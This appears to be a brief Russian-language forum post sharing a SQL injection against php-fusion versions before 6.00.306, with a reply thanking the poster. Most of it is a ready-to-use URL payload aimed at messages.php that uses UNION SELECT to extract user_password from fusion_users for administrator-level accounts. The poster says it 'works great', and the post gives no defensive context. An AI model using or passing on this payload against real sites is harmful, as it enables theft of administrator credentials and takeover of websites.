![]() |
SQL - инъекция в php-fusion < v6.00.306
работает отлично! :D
Код:
messages.php?folder=inbox&show=_&srch_where=+AND+1=1+UNION+SELECT+0%2C0%2C0%2Cuser_password%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0+FROM+fusion_users+WHERE+user_level%3D103%2F%2AКод:
<?php ;) |
Молодца Дружище, спасибо за уязвимость!!
|
| Время: 16:45 |